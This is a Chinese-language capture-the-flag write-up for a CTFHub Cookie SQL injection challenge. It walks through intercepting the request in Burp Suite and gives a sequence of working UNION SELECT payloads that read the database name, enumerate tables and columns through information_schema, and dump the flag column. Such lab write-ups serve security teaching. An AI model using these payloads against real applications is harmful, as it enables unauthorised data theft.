目录
????????SQL 注入点不止会出现在GET 参数或POST 参数中。其中Cookie注入则是一种特定的SQL注入形式,它利用了应用程序中使用的Cookie来进行攻击。
? ? ? ? 此题为Cookie注入,所以我们利用bp进行抓包,找到数据包内的Cookie进行注入。
????????因为在CTFHub中web内SQL板块使用的是同一个数据库,所以列数是相同的。于是略过了判断列数的步骤,直接进入正题。
-2 union select 1,database()
????????使用的命令为:select * from 表名 where 限制条件。
? ? ? ? table_schema=database() :选择当前连接的数据库(sqli)中的所有表。
????????group_concat:多个行的值合并为一个字符串的聚合函数。通俗的将就是回显出所有内容。
? ? ? ? 可以发现此处没有【flag】表,取而代之的是【gzuhxxtsjy】,查看该表中的列名。
???????【news】表一直都存在,所以第一想法先不考虑此表中的内容。
-2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
? ? ? ? table_name='gzuhxxtsjy' :选择表名为【gzuhxxtsjy】的表的数据。
-2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='gzuhxxtsjy'
-2 union select 1,nqxditexuo from gzuhxxtsjy